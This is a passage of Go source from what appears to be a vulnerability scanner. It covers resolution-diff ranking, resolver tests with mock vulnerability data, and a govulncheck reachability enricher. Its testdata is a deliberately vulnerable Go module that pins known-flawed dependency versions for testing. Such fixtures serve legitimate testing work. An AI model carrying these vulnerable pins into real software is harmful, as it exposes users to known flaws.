delete(oldVulns, v.OSV.GetId()) // delete so we know what's been removed } else { // This vuln was not in the original resolution - it was newly added diff.AddedVulns = append(diff.AddedVulns, v) } } // Any remaining oldVulns have been removed in the new resolution for _, idx := range oldVulns { diff.RemovedVulns = append(diff.RemovedVulns, res.Vulns[idx]) } return diff } // Compare compares ResolutionDiffs based on 'effectiveness' (best first): // // Sort order: // 1. (number of fixed vulns - introduced vulns) / (number of changed direct dependencies) [descending] // (i.e. more efficient first) // 2. number of fixed vulns [descending] // 3. number of changed direct dependencies [ascending] // 4. changed direct dependency name package names [ascending] // 5. size of changed direct dependency bump [ascending] func (a Difference) Compare(b Difference) int { // 1. 
(fixed - introduced) / (changes) [desc] // Multiply out to avoid float casts aRatio := (len(a.RemovedVulns) - len(a.AddedVulns)) * (len(b.Deps)) bRatio := (len(b.RemovedVulns) - len(b.AddedVulns)) * (len(a.Deps)) if c := cmp.Compare(aRatio, bRatio); c != 0 { return -c } // 2. number of fixed vulns [desc] if c := cmp.Compare(len(a.RemovedVulns), len(b.RemovedVulns)); c != 0 { return -c } // 3. number of changed deps [asc] if c := cmp.Compare(len(a.Deps), len(b.Deps)); c != 0 { return c } // 4. changed names [asc] for i, aDep := range a.Deps { bDep := b.Deps[i] if c := aDep.Pkg.Compare(bDep.Pkg); c != 0 { return c } } // 5. dependency bump amount [asc] for i, aDep := range a.Deps { bDep := b.Deps[i] sv := aDep.Pkg.Semver() if c := sv.Compare(aDep.NewResolved, bDep.NewResolved); c != 0 { return c } } return 0 } ================================================ FILE: internal/resolution/resolve_test.go ================================================ package resolution_test import ( "cmp" "slices" "testing" "deps.dev/util/resolve" "deps.dev/util/resolve/dep" "github.com/google/osv-scanner/v2/internal/resolution" "github.com/google/osv-scanner/v2/internal/resolution/clienttest" "github.com/google/osv-scanner/v2/internal/resolution/manifest" "github.com/google/osv-scanner/v2/internal/testutility" ) func checkResult(t *testing.T, result *resolution.Result) { t.Helper() snap := testutility.NewSnapshot() snap.MatchText(t, result.Graph.String()) type minimalVuln struct { ID string DevOnly bool Subgraphs []*resolution.DependencySubgraph } minVulns := make([]minimalVuln, len(result.Vulns)) for i, v := range result.Vulns { minVulns[i] = minimalVuln{ ID: v.OSV.GetId(), DevOnly: v.DevOnly, Subgraphs: v.Subgraphs, } } slices.SortFunc(minVulns, func(a, b minimalVuln) int { return cmp.Compare(a.ID, b.ID) }) snap.MatchJSON(t, minVulns) } func TestResolve(t *testing.T) { t.Parallel() aliasType := func(knownAs string) dep.Type { t.Helper() typ := dep.NewType() typ.AddAttr(dep.KnownAs, 
knownAs) return typ } type requirement struct { name string version string typ dep.Type groups []string } tests := []struct { name string version string system resolve.System universe string vulns string requirements []requirement opts resolution.ResolveOpts }{ { name: "simple", // simple root -> dependency -> vuln version: "1.0.0", system: resolve.NPM, universe: "./testdata/basic-universe.yaml", vulns: "./testdata/basic-vulns.json", requirements: []requirement{ { name: "dependency", version: "^1.0.0", groups: []string{"dev"}, }, }, }, { name: "direct", // vulnerability in direct dependency version: "1.0.0", system: resolve.NPM, universe: "./testdata/basic-universe.yaml", vulns: "./testdata/basic-vulns.json", requirements: []requirement{ { name: "bad", version: "^2.0.0", }, }, }, { name: "duplicates", // same package with vulns included multiple times version: "1.1.1", system: resolve.NPM, universe: "./testdata/basic-universe.yaml", vulns: "./testdata/basic-vulns.json", requirements: []requirement{ { name: "bad", version: "^1.0.0", typ: aliasType("bad-aliased"), }, { name: "dependency", version: "^2.0.0", groups: []string{"dev"}, }, { name: "dependency", version: "^1.0.0", typ: aliasType("dependency-v1"), }, }, }, { name: "different-pkgs", // same vuln in two different packages version: "3.0.0", system: resolve.NPM, universe: "./testdata/basic-universe.yaml", vulns: "./testdata/basic-vulns.json", requirements: []requirement{ { name: "bad2", version: "^1.0.0", }, { name: "dependency", version: "^1.0.0", }, }, }, { name: "existing", // manifest package/version exists in universe already version: "1.0.0", system: resolve.NPM, universe: "./testdata/basic-universe.yaml", vulns: "./testdata/basic-vulns.json", requirements: []requirement{ { name: "dependency", version: "^2.0.0", typ: dep.NewType(dep.Opt), }, }, }, { name: "non-problem", // non-problem chains version: "1.0.0", system: resolve.NPM, universe: "./testdata/basic-universe.yaml", vulns: 
"./testdata/basic-vulns.json", requirements: []requirement{ { name: "bad", version: "^1.0.0", }, { name: "dependency", version: "^3.0.0", }, }, }, { name: "diamond", // diamond dependency on vulnerable pkg version: "1.0.0", system: resolve.NPM, universe: "./testdata/diamond-universe.yaml", vulns: "./testdata/diamond-vulns.json", requirements: []requirement{ { name: "pkg", version: "^1.0.0", }, { name: "dep-one", version: "^1.0.0", groups: []string{"dev"}, }, }, }, { name: "complex", // more complex graph/vulnerability structure version: "9.9.9", system: resolve.NPM, universe: "./testdata/complex-universe.yaml", vulns: "./testdata/complex-vulns.json", requirements: []requirement{ { name: "alice", version: "^1.0.0", typ: aliasType("chuck"), }, { name: "bob", version: "2.2.2", }, { name: "dave", version: "~3.3.3", groups: []string{"dev"}, }, }, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() cl := clienttest.NewMockResolutionClient(t, tt.universe, tt.vulns) var m manifest.Manifest m.Root = resolve.Version{ VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ Name: tt.name, System: tt.system, }, Version: tt.version, VersionType: resolve.Concrete, }, } m.Groups = make(map[manifest.RequirementKey][]string) m.Requirements = make([]resolve.RequirementVersion, len(tt.requirements)) for i, req := range tt.requirements { m.Requirements[i] = resolve.RequirementVersion{ VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ Name: req.name, System: tt.system, }, Version: req.version, VersionType: resolve.Requirement, }, Type: req.typ, } m.Groups[manifest.MakeRequirementKey(m.Requirements[i])] = req.groups } res, err := resolution.Resolve(t.Context(), cl, m, tt.opts) if err != nil { t.Fatalf("error resolving: %v", err) } checkResult(t, res) }) } } ================================================ FILE: internal/resolution/testdata/basic-universe.yaml ================================================ system: npm schema: | 
dependency 0.0.1 1.0.0 bad@^1.0.0 2.0.0 bad@^2.0.0 3.0.0 bad@* bad 1.0.0 1.1.1 2.0.0 2.2.2 bad2 1.0.0 existing 1.0.0 bad@^1.0.0 bad2@^1.0.0 dependency@^0.0.1 ================================================ FILE: internal/resolution/testdata/basic-vulns.json ================================================ { "vulns": [ { "affected": [ { "package": { "ecosystem": "npm", "name": "bad" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "2.0.0" } ], "type": "SEMVER" } ] } ], "id": "OSV-000-000" }, { "affected": [ { "package": { "ecosystem": "npm", "name": "bad" }, "ranges": [ { "events": [ { "introduced": "0" } ], "type": "SEMVER" } ] }, { "package": { "ecosystem": "npm", "name": "bad2" }, "ranges": [ { "events": [ { "introduced": "0" } ], "type": "SEMVER" } ] } ], "id": "OSV-000-001" }, { "affected": [ { "package": { "ecosystem": "npm", "name": "dependency" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.0.0" } ], "type": "SEMVER" } ] } ], "id": "OSV-000-002" }, { "affected": [ { "package": { "ecosystem": "npm", "name": "existing" }, "ranges": [ { "events": [ { "introduced": "0" } ], "type": "SEMVER" } ] } ], "id": "OSV-000-003" } ] } ================================================ FILE: internal/resolution/testdata/complex-universe.yaml ================================================ system: npm schema: | alice 1.0.0 1.0.1 bob@^2.0.0 bob 2.0.0 2.0.1 2.2.2 chuck 2.0.0 bob@^2.0.1 dave 3.3.3 bob@^2.2.2 KnownAs duck|chuck@^2.0.0 ================================================ FILE: internal/resolution/testdata/complex-vulns.json ================================================ { "vulns": [ { "affected": [ { "package": { "ecosystem": "npm", "name": "alice" }, "ranges": [ { "events": [ { "introduced": "1.0.1" }, { "fixed": "2.0.0" } ], "type": "SEMVER" } ] } ], "id": "CMPLX-0000-0000" }, { "affected": [ { "package": { "ecosystem": "npm", "name": "bob" }, "ranges": [ { "events": [ { "introduced": "0" } ], "type": "SEMVER" } ] } ], "id": 
"CMPLX-1000-0000" }, { "affected": [ { "package": { "ecosystem": "npm", "name": "chuck" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.0.1" }, { "introduced": "2.0.0" }, { "fixed": "3.0.0" } ], "type": "SEMVER" } ] } ], "id": "CMPLX-2000-0000" }, { "affected": [ { "package": { "ecosystem": "npm", "name": "dave" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "3.3.2" }, { "introduced": "3.3.4" } ], "type": "SEMVER" } ] } ], "id": "CMPLX-3000-0000" } ] } ================================================ FILE: internal/resolution/testdata/diamond-universe.yaml ================================================ system: npm schema: | pkg 1.0.0 bad@^1.0.0 dep-one 1.0.0 bad@^1.0.0 dep-two@^1.0.0 dep-two 1.0.0 bad@^1.0.0 bad 1.0.0 1.1.1 ================================================ FILE: internal/resolution/testdata/diamond-vulns.json ================================================ { "vulns": [ { "affected": [ { "package": { "ecosystem": "npm", "name": "bad" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "2.0.0" } ], "type": "SEMVER" } ] } ], "id": "DIA-000-000" } ] } ================================================ FILE: internal/resolution/testmain_test.go ================================================ package resolution_test import ( "testing" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestMain(m *testing.M) { m.Run() testutility.CleanSnapshots(m) } ================================================ FILE: internal/resolution/util/depsdev.go ================================================ // Package util provides utility functions for dependency resolution. 
package util

import (
	"deps.dev/util/resolve"
	"github.com/google/osv-scalibr/extractor"
	"github.com/google/osv-scalibr/purl"
	"github.com/ossf/osv-schema/bindings/go/osvconstants"
)

// OSVEcosystem maps resolve.System constants to osvconstants.Ecosystem constants.
// Only NPM and Maven have entries; indexing with any other system yields the
// zero value of osvconstants.Ecosystem.
//
// TODO: use osvschema.Ecosystem or imodel's osvecosystem.Parsed
var OSVEcosystem = map[resolve.System]osvconstants.Ecosystem{
	resolve.NPM:   osvconstants.EcosystemNPM,
	resolve.Maven: osvconstants.EcosystemMaven,
}

// PURLType maps resolve.System constants to package-URL type strings.
// Only NPM and Maven have entries; indexing with any other system yields "".
var PURLType = map[resolve.System]string{
	resolve.NPM:   purl.TypeNPM,
	resolve.Maven: purl.TypeMaven,
}

// VKToPackageInfo builds an extractor.Package from a resolve.VersionKey,
// copying the name and version and looking the PURL type up in PURLType.
//
// A version key whose System has no PURLType entry produces a package with an
// empty PURLType rather than an error, so callers that match packages against
// advisories by ecosystem should not assume the field is always populated.
func VKToPackageInfo(vk resolve.VersionKey) *extractor.Package {
	purlType := PURLType[vk.System]
	pkg := &extractor.Package{
		Name:     vk.Name,
		Version:  vk.Version,
		PURLType: purlType,
	}

	return pkg
}

================================================
FILE: internal/scalibrenricher/govulncheck/source/govulncheck.go
================================================
// Copyright 2025 Google LLC
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.

// Package source provides an enricher that uses govulncheck to scan Go source code.
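package source

import (
	"bytes"
	"context"
	"encoding/json"
	"io"
	"os"
	"os/exec"
	"path/filepath"
	"slices"

	"github.com/google/osv-scalibr/enricher"
	"github.com/google/osv-scalibr/extractor/filesystem/language/golang/gomod"
	"github.com/google/osv-scalibr/inventory"
	"github.com/google/osv-scalibr/inventory/vex"
	"github.com/google/osv-scalibr/log"
	"github.com/google/osv-scalibr/plugin"
	"golang.org/x/vuln/scan"
)

const (
	// Name is the unique name of this enricher.
	Name = "enricher/reachability/govulncheck/source"
)

// Enricher is an enricher that runs govulncheck on Go source code.
type Enricher struct{}

// Name returns the name of the enricher.
func (e *Enricher) Name() string {
	return Name
}

// Version returns the version of the enricher.
func (e *Enricher) Version() int {
	return 0
}

// Requirements returns the requirements of the enricher: online network
// access and direct filesystem access.
//
// NOTE(review): presumably the network is needed for govulncheck's
// vulnerability database and for module resolution by the Go toolchain —
// confirm which of the two applies.
func (e *Enricher) Requirements() *plugin.Capabilities {
	return &plugin.Capabilities{
		Network:  plugin.NetworkOnline,
		DirectFS: true,
	}
}

// RequiredPlugins returns the names of the plugins required by this enricher.
func (e *Enricher) RequiredPlugins() []string {
	return []string{gomod.Name}
}

// NewEnricher returns an Enricher value. The methods are declared on
// *Enricher, so they are called through an addressable value; New returns
// the pointer form as an enricher.Enricher.
func NewEnricher() Enricher {
	return Enricher{}
}

// Enrich runs govulncheck on the Go modules in the inventory.
//
// It returns nil without doing anything when `go version` cannot be run.
// Otherwise it collects one Go version per go.mod location from the "stdlib"
// packages reported by the gomod plugin, runs govulncheck once per module
// directory under input.ScanRoot.Path, and attaches a
// VulnerableCodeNotInExecutePath signal to the package vulnerabilities that
// govulncheck reported without a called symbol.
//
// Package vulnerabilities are matched to findings by OSV ID only, so the
// findings of all modules are merged before any signal is written: an ID is
// marked as not in the execute path only if no analysed module calls the
// vulnerable symbol. Applying each module's findings separately would let a
// module that merely imports the package suppress a vulnerability that a
// sibling module reaches, and would append the same signal once per module.
//
// A govulncheck failure on one module is logged and that module is skipped;
// the method itself always returns nil.
func (e *Enricher) Enrich(ctx context.Context, input *enricher.ScanInput, inv *inventory.Inventory) error {
	// Probe for a Go toolchain. "go" is looked up on PATH, so the binary that
	// runs is whichever one the scanner's environment resolves first.
	if err := exec.CommandContext(ctx, "go", "version").Run(); err != nil {
		log.Infof("Skipping call analysis on Go code since Go is not installed.")
		return nil //nolint:nilerr
	}

	// go.mod location -> Go version declared for that module.
	goModVersions := make(map[string]string)
	for _, pkg := range inv.Packages {
		if pkg.Name != "stdlib" || !slices.Contains(pkg.Plugins, gomod.Name) {
			continue
		}

		loc := pkg.Location.PathOrEmpty()
		if loc == "" || goModVersions[loc] != "" {
			continue
		}

		// The "stdlib" entry carries the Go version from go.mod; it is handed to
		// govulncheck as GOVERSION.
		goModVersions[loc] = pkg.Version
	}

	merged := make(map[string][]*Finding)
	for goModLocation, goVersion := range goModVersions {
		modDir := filepath.Dir(goModLocation)
		absModDir := filepath.Join(input.ScanRoot.Path, modDir)

		findings, err := e.runGovulncheck(ctx, absModDir, goVersion)
		if err != nil {
			// NOTE(review): the merged view is incomplete after a failure here.
			// An ID that another module only imports can still be marked as not
			// in the execute path although the failed module was never
			// analysed; consider emitting no signals for a partial run.
			log.Errorf("govulncheck on %s: %v", modDir, err)
			continue
		}

		for id, moduleFindings := range findings {
			merged[id] = append(merged[id], moduleFindings...)
		}
	}

	if len(merged) > 0 {
		e.addSignals(inv, merged)
	}

	return nil
}

// addSignals appends a VulnerableCodeNotInExecutePath signal to every package
// vulnerability whose ID has findings in idToFindings but none whose first
// trace frame names a function. Vulnerabilities with no findings at all are
// left untouched: the absence of a finding is not treated as proof of
// unreachability.
func (e *Enricher) addSignals(inv *inventory.Inventory, idToFindings map[string][]*Finding) {
	for _, pv := range inv.PackageVulns {
		findings, ok := idToFindings[pv.Vulnerability.GetId()]
		// Skip if no findings for this package vulnerability ID
		if !ok {
			continue
		}

		// A finding counts as reachable when its first frame names a function.
		// The nil check keeps a malformed trace entry from panicking.
		called := slices.ContainsFunc(findings, func(f *Finding) bool {
			return len(f.Trace) > 0 && f.Trace[0] != nil && f.Trace[0].Function != ""
		})
		if called {
			continue
		}

		pv.ExploitabilitySignals = append(pv.ExploitabilitySignals, &vex.FindingExploitabilitySignal{
			Plugin:        Name,
			Justification: vex.VulnerableCodeNotInExecutePath,
		})
	}
}

// runGovulncheck runs govulncheck in JSON mode over every package ("./...")
// of the module in absModDir and returns the findings grouped by OSV ID.
//
// Despite its name, absModDir is only as absolute as the scan root path it
// was joined from. The arguments are passed as separate elements, so no shell
// interprets the directory name. The whole JSON output is buffered in memory
// before it is decoded.
//
// NOTE(review): the run inherits this process's complete environment
// (os.Environ) plus GOVERSION, and govulncheck loads the scanned tree through
// the local Go toolchain. When the tree is untrusted, presumably this should
// run with the same isolation as the rest of the scan and without credentials
// in the environment — confirm.
func (e *Enricher) runGovulncheck(ctx context.Context, absModDir string, goVersion string) (map[string][]*Finding, error) {
	cmd := scan.Command(ctx, "-C", absModDir, "-json", "./...")

	var out bytes.Buffer
	cmd.Stdout = &out
	cmd.Env = append(os.Environ(), "GOVERSION=go"+goVersion)

	if err := cmd.Start(); err != nil {
		return nil, err
	}
	if err := cmd.Wait(); err != nil {
		return nil, err
	}

	// Group the output of govulncheck based on the OSV ID.
	h := &osvHandler{
		idToFindings: map[string][]*Finding{},
	}
	if err := handleJSON(&out, h); err != nil {
		return nil, err
	}

	return h.idToFindings, nil
}

// osvHandler collects govulncheck findings keyed by OSV ID.
type osvHandler struct {
	idToFindings map[string][]*Finding
}

// Finding records f under its OSV ID.
func (h *osvHandler) Finding(f *Finding) {
	h.idToFindings[f.OSV] = append(h.idToFindings[f.OSV], f)
}

// handleJSON decodes a stream of JSON values from from into Message values
// and passes every non-nil Finding to to. It stops at the first decode error
// and returns it.
func handleJSON(from io.Reader, to *osvHandler) error {
	dec := json.NewDecoder(from)
	for dec.More() {
		msg := Message{}
		if err := dec.Decode(&msg); err != nil {
			return err
		}
		if msg.Finding != nil {
			to.Finding(msg.Finding)
		}
	}

	return nil
}

// New returns a new govulncheck source enricher.
func New() enricher.Enricher {
	return &Enricher{}
}

================================================
FILE: internal/scalibrenricher/govulncheck/source/govulncheck_test.go
================================================
// Copyright 2025 Google LLC
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.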
package source

import (
	"path/filepath"
	"testing"

	"github.com/google/osv-scalibr/enricher"
	"github.com/google/osv-scalibr/extractor"
	"github.com/google/osv-scalibr/extractor/filesystem/language/golang/gomod"
	scalibrfs "github.com/google/osv-scalibr/fs"
	"github.com/google/osv-scalibr/inventory"
	"github.com/google/osv-scalibr/inventory/vex"
	"github.com/google/osv-scalibr/purl"
	"github.com/ossf/osv-schema/bindings/go/osvschema"
)

// testdata is the scan root handed to the enricher.
const testdata = "./testdata"

// reachableVulnID is expected to end the test with no exploitability signal.
const reachableVulnID = "GO-2023-1558"

// unreachableVulnID is expected to receive a VulnerableCodeNotInExecutePath signal.
const unreachableVulnID = "GO-2021-0053"

// TestEnricher runs the enricher over ./testdata and checks that the
// reachable vulnerability carries no exploitability signal while the
// unreachable one is marked VulnerableCodeNotInExecutePath.
//
// The test needs a working Go toolchain: Enrich returns nil without adding
// signals when `go version` cannot be run, and the unreachable case then
// fails.
func TestEnricher(t *testing.T) {
	t.Parallel()

	pkgs := setupPackages()
	vulns := setupPackageVulns()

	input := enricher.ScanInput{
		ScanRoot: &scalibrfs.ScanRoot{
			Path: testdata,
			FS:   scalibrfs.DirFS("."),
		},
	}

	inv := inventory.Inventory{
		Packages:     pkgs,
		PackageVulns: vulns,
	}

	enr := NewEnricher()
	err := enr.Enrich(t.Context(), &input, &inv)

	if err != nil {
		t.Fatalf("govulncheck enrich failed: %s", err)
	}

	for _, vuln := range inv.PackageVulns {
		switch vuln.Vulnerability.GetId() {
		case reachableVulnID:
			// Any signal on the reachable ID means it was wrongly suppressed.
			if len(vuln.ExploitabilitySignals) != 0 {
				t.Fatalf("govulncheck enrich failed, expected %s to be reachable, but marked as unreachable", reachableVulnID)
			}
		case unreachableVulnID:
			if len(vuln.ExploitabilitySignals) == 0 || vuln.ExploitabilitySignals[0].Justification != vex.VulnerableCodeNotInExecutePath {
				t.Fatalf("govulncheck enrich failed, expected %s to be unreachable, but marked as reachable", unreachableVulnID)
			}
		}
	}
}

// setupPackages returns the inventory packages for the test: the "stdlib"
// entry with the Go version and three modules, all located at go.mod and all
// attributed to the gomod plugin.
func setupPackages() []*extractor.Package {
	return []*extractor.Package{
		{
			Name:     "stdlib",
			Version:  "1.19",
			PURLType: purl.TypeGolang,
			Location: extractor.LocationFromPath(filepath.Join(".", "go.mod")),
			Plugins:  []string{gomod.Name},
		},
		{
			Name:     "github.com/gogo/protobuf",
			Version:  "1.3.1",
			PURLType: purl.TypeGolang,
			Location: extractor.LocationFromPath(filepath.Join(".", "go.mod")),
			Plugins:  []string{gomod.Name},
		},
		{
			Name:     "github.com/ipfs/go-bitfield",
			Version:  "1.0.0",
			PURLType: purl.TypeGolang,
			Location: extractor.LocationFromPath(filepath.Join(".", "go.mod")),
			Plugins:  []string{gomod.Name},
		},
		{
			Name:     "golang.org/x/image",
			Version:  "0.4.0",
			PURLType: purl.TypeGolang,
			Location: extractor.LocationFromPath(filepath.Join(".", "go.mod")),
			Plugins:  []string{gomod.Name},
		},
	}
}

// setupPackageVulns returns one package vulnerability per test ID. Only the
// ID is set, which is the only field the enricher uses to match findings.
func setupPackageVulns() []*inventory.PackageVuln {
	return []*inventory.PackageVuln{
		{
			Vulnerability: &osvschema.Vulnerability{
				Id: reachableVulnID,
			},
		},
		{
			Vulnerability: &osvschema.Vulnerability{
				Id: unreachableVulnID,
			},
		},
	}
}

================================================
FILE: internal/scalibrenricher/govulncheck/source/result.go
================================================
// Copied from
// https://github.com/golang/vuln/blob/267a472bf377fa105988693c2a597d2b8de36ad8/internal/govulncheck/result.go
// and modified.

package source

// Message is an entry in the output stream. It will always have exactly one
// field filled in.
//
// Only the "finding" field is decoded here, so entries of any other kind
// decode to a Message whose Finding is nil.
type Message struct {
	Finding *Finding `json:"finding,omitempty"`
	// The Config, Progress, and OSV fields from the JSON output are removed, since they
	// are not used.
}

// Finding represents a single finding.
type Finding struct {
	// OSV is the id of the detected vulnerability.
	OSV string `json:"osv,omitempty"`

	// FixedVersion is the module version where the vulnerability was
	// fixed. This is empty if a fix is not available.
	//
	// If there are multiple fixed versions in the OSV report, this will
	// be the fixed version in the latest range event for the OSV report.
	//
	// For example, if the range events are
	// {introduced: 0, fixed: 1.0.0} and {introduced: 1.1.0}, the fixed version
	// will be empty.
	//
	// For the stdlib, we will show the fixed version closest to the
	// Go version that is used. For example, if a fix is available in 1.17.5 and
	// 1.18.5, and the GOVERSION is 1.17.3, 1.17.5 will be returned as the
	// fixed version.
	FixedVersion string `json:"fixed_version,omitempty"`

	// Trace contains an entry for each frame in the trace.
	//
	// Frames are sorted starting from the imported vulnerable symbol
	// until the entry point. The first frame in Frames should match
	// Symbol.
	//
	// In binary mode, trace will contain a single-frame with no position
	// information.
	//
	// When a package is imported but no vulnerable symbol is called, the trace
	// will contain a single-frame with no symbol or position information.
	//
	// The enricher in this package relies on that last case: it treats a
	// finding as reachable only when the first frame has a non-empty Function.
	Trace []*Frame `json:"trace,omitempty"`
}

// Frame represents an entry in a finding trace.
type Frame struct {
	// Module is the module path of the module containing this symbol.
	//
	// Importable packages in the standard library will have the path "stdlib".
	Module string `json:"module"`

	// Version is the module version from the build graph.
	Version string `json:"version,omitempty"`

	// Package is the import path.
	Package string `json:"package,omitempty"`

	// Function is the function name. It is empty when no vulnerable symbol
	// is called (see Finding.Trace).
	Function string `json:"function,omitempty"`

	// Receiver is the receiver type if the called symbol is a method.
	//
	// The client can create the final symbol name by
	// prepending Receiver to FuncName.
	Receiver string `json:"receiver,omitempty"`

	// Position describes an arbitrary source position
	// including the file, line, and column location.
	// A Position is valid if the line number is > 0.
	Position *Position `json:"position,omitempty"`
}

// Position is a copy of token.Position used to marshal/unmarshal
// JSON correctly.
type Position struct { Filename string `json:"filename,omitempty"` // filename, if any Offset int `json:"offset"` // offset, starting at 0 Line int `json:"line"` // line number, starting at 1 Column int `json:"column"` // column number, starting at 1 (byte count) } ================================================ FILE: internal/scalibrenricher/govulncheck/source/testdata/go.mod ================================================ module github.com/ossf-tests/osv-e2e go 1.19 require github.com/gogo/protobuf v1.3.1 require github.com/ipfs/go-bitfield v1.0.0 require golang.org/x/image v0.4.0 // indirect ================================================ FILE: internal/scalibrenricher/govulncheck/source/testdata/go.sum ================================================ github.com/gogo/protobuf v1.3.1 h1:DqDEcV5aeaTmdFBePNpYsp3FlcVH/2ISVVM9Qf8PSls= github.com/gogo/protobuf v1.3.1/go.mod h1:SlYgWuQ5SjCEi6WLHjHCa1yvBfUnHcTbrrZtXPKa29o= github.com/ipfs/go-bitfield v1.0.0 h1:y/XHm2GEmD9wKngheWNNCNL0pzrWXZwCdQGv1ikXknQ= github.com/ipfs/go-bitfield v1.0.0/go.mod h1:N/UiujQy+K+ceU1EF5EkVd1TNqevLrCQMIcAEPrdtus= github.com/kisielk/errcheck v1.2.0/go.mod h1:/BMXB+zMLi60iA8Vv6Ksmxu/1UDYcXs4uQLJ+jE2L00= github.com/kisielk/gotool v1.0.0/go.mod h1:XhKaO+MFFWcvkIS/tQcRk01m1F5IRFswLeQ+oQHNcck= github.com/yuin/goldmark v1.4.13/go.mod h1:6yULJ656Px+3vBD8DxQVa3kxgyrAnzto9xy5taEt/CY= golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= golang.org/x/crypto v0.0.0-20210921155107-089bfa567519/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= golang.org/x/image v0.4.0 h1:x1RWAiZIvERqkltrFjtQP1ycmiR5pmhjtCfVOtdURuQ= golang.org/x/image v0.4.0/go.mod h1:FVC7BI/5Ym8R25iw5OLsgshdUBbT1h5jZTpA+mvAdZ4= golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4/go.mod h1:jJ57K6gSWd91VN4djpZkiMVwK6gcyfeH4XE8wZrZaV4= golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net 
v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= golang.org/x/net v0.0.0-20220722155237-a158d28d115b/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c= golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20220722155255-886fb9371eb4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20220520151302-bc2c85ada10a/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20220722155257-8c9f86f7a55f/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= golang.org/x/term v0.0.0-20210927222741-03fcf44c2211/go.mod h1:jbD1KX2456YbFQfuXm/mYQcufACuNUgVhRMnK/tPxf8= golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/text v0.3.7/go.mod h1:u+2+/6zg+i71rQMx5EYifcz6MCKuco9NR6JIITiCfzQ= golang.org/x/text v0.7.0/go.mod h1:mrYo+phRRbMaCq/xk9113O4dZlRixOauAjOtrjsXDZ8= golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20181030221726-6c7e314b6563/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= golang.org/x/tools v0.1.12/go.mod h1:hNGJHUnrk76NpqgfD5Aqm5Crs+Hm0VOH/i9J2+nxYbc= golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod 
h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= ================================================ FILE: internal/scalibrenricher/govulncheck/source/testdata/main.go ================================================ package main import ( "log" "net/http" "github.com/gogo/protobuf/plugin/unmarshal" "github.com/gogo/protobuf/version" "github.com/ipfs/go-bitfield" ) func main() { print(version.AtLeast("v1.2.3")) unmarshal.NewUnmarshal() bitfield.NewBitfield(14) // Test stdlib err := http.ListenAndServe(":8080", nil) if err != nil { log.Fatal(err) } } ================================================ FILE: internal/scalibrenricher/govulncheck/source/testdata/osv-scanner.toml ================================================ [[PackageOverrides]] name = "stdlib" ecosystem = "Go" ignore = true reason = "This is an intentionally vulnerable test project" [[PackageOverrides]] name = "golang.org/x/image" ecosystem = "Go" ignore = true reason = "This is an intentionally vulnerable test project" [[PackageOverrides]] name = "github.com/ipfs/go-bitfield" 